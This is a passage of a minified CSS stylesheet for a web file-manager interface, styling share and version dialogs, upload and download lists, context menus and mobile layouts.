.menu-item-parent{display:block;color:#fff;}.support-space-not .share-dialog .content-box .content-info{padding:30px 20px 30px 20px;}.support-space-not .system-content .right-frame .group-title .group-size{display:none !important;}.support-space-not .size-max-set,.support-space-not .user-setting-more-btn,.support-space-not .user-setting-more{display:none;}.support-space-not .user-list .space,.support-space-not .share-view-info,.support-space-not .user-space-info{display:none;}.support-space-not .frame-main .user-space-info{display:none;}.support-space-not .frame-main .frame-left .group-space-use{display:none;}.support-space-not .frame-main .frame-left #folder-list-tree{bottom:70px;}.dropdown-menu.menu-topbar-user{right:6px;}.version-vip{height:26px;line-height:26px;padding:0;opacity:0.7;filter:alpha(opacity=70);padding-left:25px;cursor:pointer;font-size:12px;display:block;color:#eee;background:#999;}.version-vip#version_vip_1{color:#bdeaff;background:#03a9f4;}.version-vip#version_vip_2{color:#ea9df7;background:#9c27b0;}.version-vip#version_vip_3,.version-vip#version_vip_4,.version-vip#version_vip_5,.version-vip#version_vip_6{color:#fff;background:#ffc107;}.version-vip:hover{opacity:0.9;filter:alpha(opacity=90);text-decoration:none;}.version-license{width:250px;height:250px;overflow:hidden;position:absolute;z-index:9999;pointer-events:none;top:30px;left:0px;}.version-license a.line{position:absolute;pointer-events:all;width:300px;height:60px;line-height:60px;left:-70px;top:40px;font-size:20px;background:#4CAF50;text-decoration:none;-webkit-transform:rotate(-45deg);-moz-transform:rotate(-45deg);transform:rotate(-45deg);-webkit-transition:all 0.2;-moz-transition:all 0.2;-o-transition:all 0.2;-ms-transition:all 0.2;transition:all 0.2;text-align:center;color:#fff;opacity:0.9;filter:alpha(opacity=90);}.version-license a.line:hover{opacity:0.7;filter:alpha(opacity=70);}.path-select-input{width:550px;padding:7px;background:rgba(255,255,255,0.3);border:1px solid rgba(100,100,100,0.3);color:#000;}.aui-state-lock .aui-min{display:none;}.dialog-copyright{width:400px !important;}.dialog-copyright,.share-dialog,.check-version-dialog{min-width:400px;}.dialog-copyright.dialog-simple .aui-outer,.share-dialog.dialog-simple .aui-outer,.check-version-dialog.dialog-simple .aui-outer{overflow:inherit;box-shadow:0 0px 60px rgba(0,0,0,0.4);border-radius:5px;border:none;}.dialog-copyright.dialog-simple .aui-outer,.dialog-copyright.dialog-simple .aui-outer.dialog-mouse-in,.share-dialog.dialog-simple .aui-outer,.share-dialog.dialog-simple .aui-outer.dialog-mouse-in,.check-version-dialog.dialog-simple .aui-outer,.check-version-dialog.dialog-simple .aui-outer.dialog-mouse-in{border:none;}.dialog-copyright.dialog-simple .aui-outer .aui-main,.dialog-copyright.dialog-simple .aui-outer.dialog-mouse-in .aui-main,.share-dialog.dialog-simple .aui-outer .aui-main,.share-dialog.dialog-simple .aui-outer.dialog-mouse-in .aui-main,.check-version-dialog.dialog-simple .aui-outer .aui-main,.check-version-dialog.dialog-simple .aui-outer.dialog-mouse-in .aui-main{border:none;}.dialog-copyright.dialog-simple .aui-outer .aui-header,.dialog-copyright.dialog-simple .aui-outer.dialog-mouse-in .aui-header,.share-dialog.dialog-simple .aui-outer .aui-header,.share-dialog.dialog-simple .aui-outer.dialog-mouse-in .aui-header,.check-version-dialog.dialog-simple .aui-outer .aui-header,.check-version-dialog.dialog-simple .aui-outer.dialog-mouse-in .aui-header{border:none;}.dialog-copyright.dialog-simple .aui-header,.share-dialog.dialog-simple .aui-header,.check-version-dialog.dialog-simple .aui-header{background:transparent;opacity:1.0;filter:alpha(opacity=100);border:none;}.dialog-copyright.dialog-simple .aui-nw,.dialog-copyright.dialog-simple .aui-n,.dialog-copyright.dialog-simple .aui-ne,.dialog-copyright.dialog-simple .aui-w,.dialog-copyright.dialog-simple .aui-e,.dialog-copyright.dialog-simple .aui-sw,.dialog-copyright.dialog-simple .aui-s,.dialog-copyright.dialog-simple .aui-se,.share-dialog.dialog-simple .aui-nw,.share-dialog.dialog-simple .aui-n,.share-dialog.dialog-simple .aui-ne,.share-dialog.dialog-simple .aui-w,.share-dialog.dialog-simple .aui-e,.share-dialog.dialog-simple .aui-sw,.share-dialog.dialog-simple .aui-s,.share-dialog.dialog-simple .aui-se,.check-version-dialog.dialog-simple .aui-nw,.check-version-dialog.dialog-simple .aui-n,.check-version-dialog.dialog-simple .aui-ne,.check-version-dialog.dialog-simple .aui-w,.check-version-dialog.dialog-simple .aui-e,.check-version-dialog.dialog-simple .aui-sw,.check-version-dialog.dialog-simple .aui-s,.check-version-dialog.dialog-simple .aui-se{height:0px;width:0px;background:none;}.dialog-copyright.dialog-simple .aui-inner,.share-dialog.dialog-simple .aui-inner,.check-version-dialog.dialog-simple .aui-inner{border:none;background:none;}.dialog-copyright.dialog-simple .aui-title,.share-dialog.dialog-simple .aui-title,.check-version-dialog.dialog-simple .aui-title{opacity:0.01;filter:alpha(opacity=1);top:0px;position:absolute;width:100%;height:100%;z-index:5;}.dialog-copyright.dialog-simple .aui-min,.dialog-copyright.dialog-simple .aui-max,.share-dialog.dialog-simple .aui-min,.share-dialog.dialog-simple .aui-max,.check-version-dialog.dialog-simple .aui-min,.check-version-dialog.dialog-simple .aui-max{display:none;}.dialog-copyright.dialog-simple .aui-title-bar,.share-dialog.dialog-simple .aui-title-bar,.check-version-dialog.dialog-simple .aui-title-bar{bottom:0px;overflow:hidden;height:100px;position:absolute;margin-top:-120px;top:120px;margin-left:0px;border-radius:4px;}.dialog-copyright.dialog-simple .aui-close,.share-dialog.dialog-simple .aui-close,.check-version-dialog.dialog-simple .aui-close{opacity:0.6;filter:alpha(opacity=60);background:rgba(0,0,0,0.5);width:100px;height:100px;top:-50px;right:-50px;border-radius:50px;text-align:left;font-size:20px;z-index:100;padding:0;}.dialog-copyright.dialog-simple .aui-close:hover,.share-dialog.dialog-simple .aui-close:hover,.check-version-dialog.dialog-simple .aui-close:hover{opacity:0.6;filter:alpha(opacity=60);}.dialog-copyright.dialog-simple .aui-close:active,.share-dialog.dialog-simple .aui-close:active,.check-version-dialog.dialog-simple .aui-close:active{opacity:1.0;filter:alpha(opacity=100);}.dialog-copyright.dialog-simple .aui-close::before,.share-dialog.dialog-simple .aui-close::before,.check-version-dialog.dialog-simple .aui-close::before{padding-left:22px;line-height:140px;}.dialog-copyright .aui-footer,.share-dialog .aui-footer,.check-version-dialog .aui-footer{display:none;}.check-version-dialog .update-box{margin-top:0px;}.share-dialog .content-box .content-info .input-line .open-window,.pathinfo .input-group-btn .open-window{margin-right:-1px;border-radius:0px;}.dialog-copyright .dialog-copyright-content,.check-version-dialog .aui-content{-khtml-user-select:text;-webkit-user-select:text;-moz-user-select:text;-ms-user-select:text;-o-user-select:text;user-select:text;width:auto;border-radius:6px;width:400px;-webkit-box-shadow:0px 10px 60px rgba(0,0,0,0.4);-moz-box-shadow:0px 10px 60px rgba(0,0,0,0.4);box-shadow:0px 10px 60px rgba(0,0,0,0.4);border:1px solid #ccc \9;padding-bottom:30px;background:#fff;background:rgba(255,255,255,0.9);}.dialog-copyright .dialog-copyright-content .title,.check-version-dialog .aui-content .title{width:100%;background:#6699cc url("../../../images/common/login.png");height:150px;padding-top:0px;border-top-left-radius:5px;border-top-right-radius:5px;}.dialog-copyright .dialog-copyright-content .title .logo,.check-version-dialog .aui-content .title .logo{text-align:center;font-size:35px;width:100%;padding-top:40px;color:#aaddff;-webkit-box-reflect:below -13px -webkit-gradient(linear,left top,left bottom,from(transparent),to(rgba(255,255,255,0.2)));background-image:-webkit-linear-gradient(92deg,#FFFFFF,#14A1FF);-webkit-background-clip:text;-webkit-text-fill-color:transparent;-webkit-animation:hue 6s 100 linear;}.dialog-copyright .dialog-copyright-content .title .logo i,.check-version-dialog .aui-content .title .logo i{color:#aaddff;font-weight:400;margin-right:10px;}.dialog-copyright .dialog-copyright-content .title .info,.check-version-dialog .aui-content .title .info{text-align:right;font-size:1.15em;color:#aaddff;padding-right:14px;padding-top:30px;}.dialog-copyright .dialog-copyright-content .content,.check-version-dialog .aui-content .content{padding:20px;}.dialog-copyright .dialog-copyright-content .content p,.check-version-dialog .aui-content .content p{text-indent:2em;color:#333;margin-bottom:30px;}.dialog-copyright .dialog-copyright-content .content a,.check-version-dialog .aui-content .content a{padding-right:5px;}.dialog-copyright .dialog-copyright-content .content div,.check-version-dialog .aui-content .content div{text-align:center;padding-bottom:5px;}.check-version-dialog.dialog-simple .aui-title-bar{margin-top:-120px;}.share-dialog .content-box{-webkit-box-shadow:0 5px 30px rgba(0,0,0,0.5);-moz-box-shadow:0 5px 30px rgba(0,0,0,0.5);box-shadow:0 5px 30px rgba(0,0,0,0.5);border-radius:5px;background:#fff;border:1px solid #ccc \9;width:auto;}.share-dialog .content-box .title{width:100%;color:#fff;height:100px;border-radius:5px 5px 0 0;background:#6699cc url('../../../images/common/login.png');}.share-dialog .content-box .titleinfo{text-align:center;font-size:35px;height:60px;overflow:hidden;line-height:80px;}.share-dialog .content-box .titleinfo i{color:#dff;font-size:30px;padding-right:10px;}.share-dialog .content-box .share-view-info{width:200px;margin:0 auto;margin-top:0px;padding:1px 5px;text-align:center;border-radius:17px;background:#117eaf;background:rgba(0,0,0,0.2);opacity:0.8;filter:alpha(opacity=80);}.share-dialog .content-box .content-info{padding:10px;padding-left:20px;}.share-dialog .content-box .content-info .input-line{margin:6px 0 8px 0;position:relative;}.share-dialog .content-box .content-info .input-line .input-title{display:block;width:80px;padding-top:4px;float:left;height:30px;padding-right:10px;text-align:right;}.share-dialog .content-box .content-info .input-line input[type="text"]{border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;height:32px;line-height:30px;padding:0px 5px;width:150px;margin-right:10px;float:left;border-radius:3px;}.share-dialog .content-box .content-info .input-line input[type="text"]:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.share-dialog .content-box .content-info .input-line label{margin-top:8px;margin-right:10px;}.share-dialog .content-box .content-info .input-line label input{margin:0 5px 5px 0;}.share-dialog .content-box .content-info .input-line .desc{font-size:1em;color:#bbb;font-style:normal;padding-left:0px;}.share-dialog .content-box .content-info .input-line .share-name{width:215px;margin-right:10px;}.share-dialog .content-box .content-info .input-line .share-url{margin-right:0;border-radius:3px 0 0 3px;width:167px !important;height:33px;}.share-dialog .content-box .content-info .input-line .share-more{line-height:33px;}.share-dialog .content-box .content-info .input-line .input-group-btn{float:left;}.share-dialog .content-box .content-info .input-line .dropdown-toggle{margin-left:-5px;border-radius:0 3px 3px 0;}.share-dialog .content-box .content-info .input-line .open-window{margin-left:-12px;}.share-dialog .content-box .content-info .input-line .share-copy{width:60px;border-radius:0px;margin-left:-7px;}.share-dialog .content-box .content-info .input-line.select-path input[type="text"]{width:155px;}.share-dialog .content-box .content-info .input-line.select-path a.select-btn{margin-left:-14px;padding:5px 8px 5px;font-size:15px;border-top-left-radius:0px;border-bottom-left-radius:0px;}.share-dialog .content-box .content-info .share-others{margin:-8px 0 -8px 0;}.share-dialog .content-box .share-action{border-top:1px solid #eee;background:#f8f8f8;height:60px;border-radius:0 0 4px 4px;}.share-dialog .content-box .share-action button{float:right;margin:10px 20px 10px 0px;outline:0;}.share-dialog .content-box .share-action .share-remove-button,.share-dialog .content-box .share-action .remove-button{float:right;margin-top:18px;color:#888;margin-right:20px;font-size:14px;}.share-dialog .content-box .share-action .share-remove-button:hover,.share-dialog .content-box .share-action .remove-button:hover{color:#f30;}.file-list-icon .file{position:relative;}.file-list-icon .file .download{position:absolute;bottom:4px;margin-left:45px;opacity:0.5;filter:alpha(opacity=50);}.file-list-icon .file .download .btn{font-size:1.25em;padding:0;display:block;border-radius:18px;height:30px;line-height:30px;width:30px;color:#aaa;}.file-list-list .file{position:relative;}.file-list-list .file .download{position:absolute;bottom:-2px;margin-left:45px;left:180px;z-index:99;opacity:0.5;filter:alpha(opacity=50);}.file-list-list .file .download .btn{font-size:1.25em;padding:0;display:block;border-radius:18px;height:28px;line-height:28px;width:28px;color:#aaa;}.pathSelectApi .aui-footer .aui-buttons{padding:15px;}.pathSelectApi .aui-footer .label{position:absolute;right:175px;margin-top:6px;opacity:0.7;filter:alpha(opacity=70);}body div.file-continer .file.file-not-writeable,body .frame-main .frame-left .ztree li a.file-not-writeable{opacity:0.7;filter:alpha(opacity=70);color:#08c !important;}body div.file-continer .file.file-not-readable,body div.file-continer .file.file-not-readable.file-not-writeable,body .frame-main .frame-left .ztree li a.file-not-readable,body .frame-main .frame-left .ztree li a.file-not-readable.file-not-writeable{opacity:0.4;filter:alpha(opacity=40);color:#a00 !important;}.url-link input{border:1px solid #ddd;background:#fff;line-height:30px;height:30px;width:300px;margin-bottom:15px;padding:0 5px;}.aui-content .ajaxError{-khtml-user-select:text;-webkit-user-select:text;-moz-user-select:text;-ms-user-select:text;-o-user-select:text;user-select:text;color:#f60;position:absolute;left:0px;right:0px;bottom:0px;top:40px;overflow:auto;padding:10px;}.pathinfo{font-size:1em;width:350px;min-height:300px;padding:20px 0 10px 0;color:#446;}.pathinfo .line{width:95%;margin:8px auto 8px auto;height:0px;border-bottom:1px solid #eee;}.pathinfo .download-url{padding:0px 5px;width:140px;line-height:32px;height:32px;}.pathinfo .p{margin-bottom:2px;}.pathinfo .p .icon{width:40px;height:40px;float:left;border:1px solid #f6f6f6;margin-left:10px;}.pathinfo .p input.info-chmod{padding:0px 10px;width:55px;color:#999;margin-right:10px;display:inline-block;height:25px;line-height:25px;}.pathinfo .p .title{width:80px;float:left;color:#888;text-align:right;}.pathinfo .p .content{float:left;width:240px;word-break:break-all;color:#666;-khtml-user-select:text;-webkit-user-select:text;-moz-user-select:text;-ms-user-select:text;-o-user-select:text;user-select:text;font-size:1em;margin-left:15px;}.pathinfo .p .content.file-md5-loading{background:url("../../../images/common/loading.gif") 18px 5px no-repeat;}.pathinfo input{border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;line-height:28px;padding:2px 5px;width:150px;float:left;height:28px;border-radius:3px;}.pathinfo input:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.pathinfo .download-url{margin-right:0;border-radius:3px 0 0 3px;}.file-drag-upload .aui-content{overflow-y:scroll;}.fileupload{padding-left:25px;}.fileupload span.status{padding-left:10px;font-size:10px;color:#f96;}.movie-player-dialog{overflow:hidden;}.flash-player{width:100%;height:100%;}.wmp-player{width:0%;height:0%;}.movie-player-dialog .aui-content{background:#000;}.dialog-path-remove .aui-content{word-wrap:break-word;width:auto;}.server-dwonload-textarea textarea{border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;}.server-dwonload-textarea textarea:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.file-upload-box{height:385px;padding:5px;min-width:365px;overflow:hidden;}.file-upload-box .topbar-nav{border-bottom:1px solid #ddd;margin-top:6px;}.file-upload-box .menu{display:block;text-decoration:none;float:left;padding:0px 15px;height:26px;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffffff', endColorstr='#eeeeee');background-image:-webkit-linear-gradient(top,#fff,#eee);background-image:-moz-linear-gradient(top,#fff,#eee);background-image:-o-linear-gradient(top,#fff,#eee);background-image:-ms-linear-gradient(top,#fff,#eee);background-image:linear-gradient(top,#fff,#eee);-pie-background:linear-gradient(to top,#fff,#eee);font-size:1em;border:1px solid #ccc;text-align:center;line-height:24px;margin-right:5px;margin-bottom:-1px;color:#444;border-radius:4px 4px 0 0;}.file-upload-box .menu.this{background:#fff;border-bottom:1px solid #fff;}.file-upload-box .menu:hover{background:#fff;}.file-upload-box .upload-box{margin-top:10px;}.file-upload-box .download-btn-group{margin-left:-10px;margin-top:-2px;margin-top:-4px \9;}.file-upload-box .download-btn-group .download-start{border-radius:0px;}.file-upload-box .upload-box-tips .btn.btn-default{border-radius:3px;color:#555;}.file-upload-box .upload-box-tips .btn-group>.btn:last-child:not(:first-child),.file-upload-box .upload-box-tips .btn-group>.dropdown-toggle:not(:first-child){border-bottom-left-radius:0;border-top-left-radius:0;}.file-upload-box div a.left{margin-left:10px;}.file-upload-box div a.right{position:absolute;right:5px;}.file-upload-box span.info{font-size:1em;font-style:italic;padding:0px 0 5px 10px;}.file-upload-box i{font-size:1em;color:#aaa;padding-left:10px;}.file-upload-box .list{margin:10px 15px 10px 0;}.file-upload-box .list input{margin-left:10px;width:190px;height:22px;line-height:24px;padding:0px 3px;border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;}.file-upload-box .list input:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 4px #75A1F0;}.file-upload-box .submit input{float:right;padding:4px 20px;background:#ddd;border:none;margin-right:36px;margin-top:10px;}.file-upload-box .submit input:hover{background:#bbb;}.file-upload-box .submit input:active{background:#444;color:#fff;}.file-upload-box .uploader-content{border:1px solid #ddd;margin:0 10px;font-size:1em;overflow:auto;position:absolute;bottom:10px;right:0px;left:0px;top:124px;background:url("../../../images/common/drop_upload.png") no-repeat center;}.file-upload-box #downloader{border:1px solid #ddd;margin:0 10px;font-size:1em;overflow:auto;position:absolute;bottom:10px;right:0px;left:0px;top:124px;}.file-upload-box .webuploader-container{position:relative;}.file-upload-box .webuploader-element-invisible{position:absolute !important;clip:rect(1px 1px 1px 1px);clip:rect(1px,1px,1px,1px);}.file-upload-box .webuploader-pick{position:relative;display:inline-block;color:#fff;text-align:center;height:27px;line-height:27px;border-radius:3px;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#84c8ff', endColorstr='#6091ff');background-image:-webkit-linear-gradient(top,#84C8FF,#6091FF);background-image:-moz-linear-gradient(top,#84C8FF,#6091FF);background-image:-o-linear-gradient(top,#84C8FF,#6091FF);background-image:-ms-linear-gradient(top,#84C8FF,#6091FF);background-image:linear-gradient(top,#84C8FF,#6091FF);-pie-background:linear-gradient(to top,#84C8FF,#6091FF);cursor:pointer;padding:0px 15px;}.file-upload-box .webuploader-pick-hover{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#84c8ff', endColorstr='#6091ff');background-image:-webkit-linear-gradient(top,#84C8FF,#6091FF);background-image:-moz-linear-gradient(top,#84C8FF,#6091FF);background-image:-o-linear-gradient(top,#84C8FF,#6091FF);background-image:-ms-linear-gradient(top,#84C8FF,#6091FF);background-image:linear-gradient(top,#84C8FF,#6091FF);-pie-background:linear-gradient(to top,#84C8FF,#6091FF);box-shadow:inset 0 1px 1em rgba(0,0,0,0.3);}.file-upload-box .upload-cert{width:24px;background:#def;height:100%;float:left;cursor:pointer;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#84c8ff', endColorstr='#6091ff');background-image:-webkit-linear-gradient(top,#84C8FF,#6091FF);background-image:-moz-linear-gradient(top,#84C8FF,#6091FF);background-image:-o-linear-gradient(top,#84C8FF,#6091FF);background-image:-ms-linear-gradient(top,#84C8FF,#6091FF);background-image:linear-gradient(top,#84C8FF,#6091FF);-pie-background:linear-gradient(to top,#84C8FF,#6091FF);height:27px;line-height:27px;position:relative;z-index:10;padding:0;border:none;margin-left:-5px;border-left:1px solid rgba(0,0,0,0.1);border-top-right-radius:3px;border-bottom-right-radius:3px;}.file-upload-box .upload-cert .caret{margin-top:-2px;margin-left:-1px;border-top:4px solid #fff;}.file-upload-box .upload-cert-box .dropdown-menu{right:inherit;top:inherit;margin-top:30px;}.file-upload-box .upload-cert-box .dropdown-menu:before{right:inherit;left:10px;}.file-upload-box .upload-cert-box .dropdown-menu:after{right:inherit;left:11px;}.file-upload-box .upload-cert-box.open.upload-cert,.file-upload-box .upload-cert-box .upload-cert:hover{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#84c8ff', endColorstr='#6091ff');background-image:-webkit-linear-gradient(top,#84C8FF,#6091FF);background-image:-moz-linear-gradient(top,#84C8FF,#6091FF);background-image:-o-linear-gradient(top,#84C8FF,#6091FF);background-image:-ms-linear-gradient(top,#84C8FF,#6091FF);background-image:linear-gradient(top,#84C8FF,#6091FF);-pie-background:linear-gradient(to top,#84C8FF,#6091FF);box-shadow:inset 0 1px 1em rgba(0,0,0,0.3);}.file-upload-box .webuploader-pick-disable{opacity:0.6;filter:alpha(opacity=60);pointer-events:none;}.file-upload-box .btns{margin-bottom:10px;font-size:1em;height:28px;}.file-upload-box .btns .tips{float:right;line-height:30px;}.file-upload-box .btns #picker{float:left;}.file-upload-box .upload-box-tips{line-height:34px;color:#888;position:absolute;right:10px;}.file-upload-box .upload-box-config{box-shadow:inset 0px 1px 6px rgba(0,0,0,0.3);border-radius:2px;margin-bottom:10px;padding:4px;}.file-upload-box .upload-box-config .upload-check-box{margin-left:10px;}.file-upload-box .upload-box-config label{margin-left:15px;}.file-upload-box .upload-box-config label input{margin-right:5px;}.file-upload-box .uploader-list .item,.file-upload-box .download-list .item{padding:0px;height:35px;overflow:hidden;position:relative;border-bottom:1px solid #ccc;background:#fefefe;}.file-upload-box .uploader-list .item .info,.file-upload-box .download-list .item .info{color:#224;line-height:35px;padding:0 5px;z-index:100;position:relative;font-size:1em;}.file-upload-box .uploader-list .item .info span,.file-upload-box .uploader-list .item .info a,.file-upload-box .download-list .item .info span,.file-upload-box .download-list .item .info a{float:left;height:30px;display:block;overflow:hidden;text-overflow:ellipsis;white-space:nowrap;}.file-upload-box .uploader-list .item .info .title,.file-upload-box .download-list .item .info .title{color:#3A87AD;width:160px;width:50%;font-weight:800;}.file-upload-box .uploader-list .item .info .size,.file-upload-box .download-list .item .info .size{width:45px;text-align:center;color:#3A87AD;font-size:12px;}.file-upload-box .uploader-list .item .info .state,.file-upload-box .download-list .item .info .state{width:100px;width:27%;text-align:right;font-size:12px;}.file-upload-box .uploader-list .item .info .font-icon,.file-upload-box .download-list .item .info .font-icon{margin-left:12px;font-size:20px;width:20px;line-height:35px;cursor:pointer;color:#bbb;}.file-upload-box .uploader-list .item .info .font-icon:hover,.file-upload-box .download-list .item .info .font-icon:hover{text-decoration:none;color:#f60;}.file-upload-box .uploader-list .item .info .icon-ok,.file-upload-box .download-list .item .info .icon-ok{color:#40AA53;}.file-upload-box .uploader-list .item .info .error,.file-upload-box .download-list .item .info .error{color:#f30;}.file-upload-box .uploader-list .item.success,.file-upload-box .download-list .item.success{background:#eaf8ff;}.file-upload-box .uploader-list .item.error,.file-upload-box .download-list .item.error{background:#ffe8e6;}.file-upload-box .uploader-list .item .progress,.file-upload-box .download-list .item .progress{height:38px;margin:0px;width:100%;border-radius:0;box-shadow:none;position:absolute;top:0;}.file-upload-box .uploader-list .item .progress-bar,.file-upload-box .download-list .item .progress-bar{background-color:#adf;background-image:linear-gradient(45deg,rgba(255,255,255,0.35) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.35) 50%,rgba(255,255,255,0.35) 75%,transparent 75%,transparent);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ddeeff',endColorstr='#88ccff',GradientType=1);BACKGROUND-REPEAT:repeat-x;}.file-upload-box .uploader-list .success:hover,.file-upload-box .download-list .success:hover{cursor:pointer;background:#def;border-bottom:1px solid #3A87AD;}@media screen and (-ms-high-contrast:active),(-ms-high-contrast:none){.btn{ padding:5px 14px;} input[type='checkbox'].kui-checkbox-ios.size-big + em{ height:27px;} #body .system-content .right-frame .user-list table tr td.select input{ position:relative;top:4px;} #body table tr input[type='text']{ line-height:22px;} .do-search-box .search-header .btn-right{ margin:-9px 0 0 -2px;height:23px;} .appbox .appline.icon .open{ margin-top:-2px;} .appbox .appline label{ position:relative;top:-4px;} #body .main .group-editor .tag input{ position:relative;top:-5px;} .share-dialog .aui-border{ overflow:auto;} .share-dialog .content-box .content-info .input-line.select-path a.select-btn{ padding:3px 8px 4px;} .kui-radio + span, .kui-checkbox + span{ position:relative;top:-6px;} .kui-radio.size-small + span, .kui-checkbox.size-small + span{ position:relative;top:-4px;} .kui-radio.size-smallx + span, .kui-checkbox.size-smallx + span{ position:relative;top:-2px;}}@media (max-width:743px){html #body .app-menu-left, html body .app-menu-left{ width:50px;min-width:50px;} html #body .app-menu-left .search{ opacity:0.001;} html #body .menu-left .setting a.selected, html body .menu-left .setting a.selected{ padding-left:0px;margin-left:-5px;} html #body .main.app-content, html body .main.app-content{ left:50px;} html #body .main.app-content .app-list, html body .main.app-content .app-list{ justify-content:space-around;} html .form-box .form-row .setting-title{ text-align:left;} html .form-box .form-row.form-userSelect .setting-content{ padding:10px 5%;} html .form-box .form-row .setting-content{ width:90%;} html body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group{ width:100%;height:40px;} html body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .form-box.config-box .panel-body{ left:0px;top:80px;} html body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item{ float:left;} html #body.plugin-page .app-menu-left .line, html body.plugin-page .app-menu-left .line{ padding:4px 0;} html body #body .menu-left, html body #body .app-menu-left{ width:50px;min-width:50px;} html body #body .menu-left h1, html body #body .app-menu-left h1{ font-size:14px;font-weight:800 !important;padding:10px 0px 10px 0px;text-align:center;} html body #body .menu-left .font-icon, html body #body .app-menu-left .font-icon{ padding-right:30px;} html #body .setting-tools-right, html body .setting-tools-right{ top:0;} html #body .main .nav a, html body .main .nav a{ padding:5px 10px;} html #body .main .nav, html body .main .nav{ margin-right:0px;} html #body .setting-tab, html body .setting-tab, html #body .system-content, html body .system-content{ margin-right:10px;} html #body .main, html body .main{ left:50px;width:auto;margin-right:10px;} html .form-box .form-row .desc, html .form-box .form-row .setting-content i{ display:block;} html #body .setting-tab .form-row, html body .setting-tab .form-row, html #body .system-content .form-row, html body .system-content .form-row{ background:#fafafa;border-radius:4px;padding:0 5px;} html .form-box .form-row .setting-title{ height:20px;line-height:20px;} html .form-box .form-row{ padding:0;} html .form-box .form-row input[type='text'], html .form-box .form-row input[type='password'], html .form-box .form-row input[type='number']{ width:180px;} html .form-box .form-row #wallpage-url{ width:150px !important;} html #body .main .section .content .box p, html body .main .section .content .box p{ text-indent:10px;} html #body .system-content.setting-member{ width:800px;} html body.setting-page .select-user-group .right-content, html body.setting-page .select-user-group .left-content{ width:170px;} html .topbar .content .top-right ul.dropdown-menu.topbar-language{ width:235px;max-height:800px;} html #body .main .section .box, html body .main .section .box{ margin-right:10px;} html #body .main .section .box .list, html body .main .section .box .list{ width:95px;height:95px;} html #body .main .section .box .list .ico, html body .main .section .box .list .ico{ width:75px;height:60px;} html #body .panel, html body .panel{ margin-right:0px;} html #body .main.app-content .app-list .app-li, html body .main.app-content .app-list .app-li{ margin:0 5px 20px 0;width:130px;} html #body .main.app-content .app-model, html body .main.app-content .app-model{ padding:10px;} html #body .menu-left .setting a, html body .menu-left .setting a{ text-indent:6px;} html .file-list-list .file .filename, html #main-title .filename, html .file-list-list .file .filetime, html #main-title .filetime{ width:100px;} html .file-list-list .file .filetype, html #main-title .filetype, html .file-list-list .file .filesize, html #main-title .filesize{ width:30px;} html .topbar .content .btn-wap-menu{ display:block !important;visibility:visible !important;position:absolute;text-align:center;z-index:100;left:0;top:0;padding:0;background:rgba(0,0,0,0.05);width:45px;height:38px;line-height:40px;} html .topbar .content .btn-wap-menu i.font-icon{ padding-right:0;} html .topbar .content .top-left.collapse{ display:none;} html .topbar .content .top-left{ width:170px;height:auto;background:#fff;color:#666;position:absolute;left:45px;z-index:100;border:1px solid rgba(0,0,0,0.1);box-shadow:0 4px 30px rgba(0,0,0,0.15);} html .topbar .content .top-left .topbar-menu.title{ display:none;} html .topbar .content .top-left .topbar-menu{ float:none;border:none;} html body#page-desktop .topbar .content .btn-wap-menu{ color:#fff;} html body#page-desktop .topbar .content .top-left{ background:rgba(0,0,0,0.7);}}@-webkit-keyframes fadein{0%{ opacity:0;} 50%{ opacity:0.4;}}.playmusic-icon{display:none;}.context-menu-list{margin:0;margin-left:4px;min-width:190px;max-width:300px;font-size:1em;display:inline-block;position:absolute;list-style-type:none;padding:8px 0px;border:none;border:1px solid #ccc \9;border-radius:4px;background:#fff;-webkit-box-shadow:0 10px 80px rgba(0,0,0,0.4);-moz-box-shadow:0 10px 80px rgba(0,0,0,0.4);box-shadow:0 10px 80px rgba(0,0,0,0.4);}.context-menu-list span b{display:inline-block;font-size:1em;font-weight:200;color:#aaa;padding-left:10px;min-width:50px;text-align:right;overflow:hidden;position:absolute;right:10px;width:65px;}.context-menu-list .hover>span>b{color:#fff;}.context-menu-list.menu-auto-fit{top:5px !important;}.context-menu-list li.selected{border-left:none !important;background:none;}.context-menu-list li.selected i.font-icon{color:#aaa;font-family:FontAwesome;font-weight:normal;font-style:normal;}.context-menu-list li.selected i.font-icon:before{content:"\f00c" !important;}.context-menu-list .context-menu-submenu:after{content:"\f0da";font-family:FontAwesome;display:inline-block;float:right;margin-right:0px;right:10px;position:absolute;}.context-menu-list .context-menu-item{display:block;cursor:pointer;white-space:nowrap;clear:both;line-height:25px;height:23px;position:relative;border:none;padding:0px 20px 0 15px;color:#222;-webkit-transition:background-color .1s;-moz-transition:background-color .1s;-o-transition:background-color .1s;-ms-transition:background-color .1s;transition:background-color .1s;}.context-menu-list .context-menu-item 